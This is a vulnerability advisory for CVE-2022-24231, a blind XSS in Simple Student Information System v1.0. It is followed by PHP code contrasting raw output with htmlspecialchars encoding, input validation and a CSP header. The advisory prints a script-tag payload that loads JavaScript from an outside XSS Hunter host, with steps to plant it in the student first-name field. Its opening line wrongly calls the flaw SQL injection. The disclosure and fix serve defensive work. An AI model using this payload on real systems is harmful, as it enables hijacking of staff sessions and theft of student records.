CVE-2022-24231: OpenSource/Blind_XSS at main · nsparker1337/OpenSource

Simple Student Information System v1.0 was discovered to contain a SQL injection vulnerability via add/Student.


# Exploit Title: Student Information System - Blind XSS

# Exploit Author: NS Kumar (n1_x)

# Vendor Name: oretnom23

# Vendor Homepage: https://www.sourcecodester.com/php/15147/simple-student-information-system-phpoop-free-source-code.html

# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sis_0_1.zip

# Version: v1.0

# Tested on: Parrot GNU/Linux 4.10, Apache

# CVE: ytd

Description:

A Blind XSS issue in Student Information System v1.0 allows injection of arbitrary JavaScript via add/Student.

Payload used:

"><script src=https://d4.xss.ht></script>

Steps to reproduce:

1- Go to http://victim.com

2- In the “staff portal” option, paste the payload in the student first name field.

3- Then go to your XSS Hunter; you will see that the XSS fires an alert.
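For the fix side, the following is an added example, not part of the original advisory or the application's own code. It assumes the stored first name is later echoed into a `value` attribute on a staff-side page, which the `">` prefix of the payload suggests; the markup and function names are hypothetical.

```php
<?php
// Added example. Markup and function names are hypothetical; this is not
// code from the Student Information System.
declare(strict_types=1);

// The payload string published in the advisory above.
const PAYLOAD = '"><script src=https://d4.xss.ht></script>';

// Vulnerable pattern: the stored value is echoed raw into an attribute, so a
// double quote in the data ends the attribute and the rest becomes markup.
function render_raw(string $firstName): string
{
    return '<input name="firstname" value="' . $firstName . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function render_encoded(string $firstName): string
{
    $safe = htmlspecialchars($firstName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="firstname" value="' . $safe . '">';
}

// Input-side check (defence in depth, not a substitute for encoding):
// a letter first, then letters, combining marks, space, dot, apostrophe, hyphen.
function is_plausible_name(string $firstName): bool
{
    return preg_match('/^\p{L}[\p{L}\p{M} .\'-]{0,63}$/u', $firstName) === 1;
}

// Response header for pages that display student records. If an encoding call
// is missed somewhere, the browser still refuses inline and off-origin script.
function csp_header(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "object-src 'none'; base-uri 'none'";
}

echo 'raw:      ', render_raw(PAYLOAD), PHP_EOL;
echo 'encoded:  ', render_encoded(PAYLOAD), PHP_EOL;
echo 'payload accepted as name: ', var_export(is_plausible_name(PAYLOAD), true), PHP_EOL;
echo "O'Neil accepted as name:  ", var_export(is_plausible_name("O'Neil"), true), PHP_EOL;
echo csp_header(), PHP_EOL;
```

In a real page the string from `csp_header()` would be sent with `header()` before any output; it is echoed here so the script runs from the command line.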
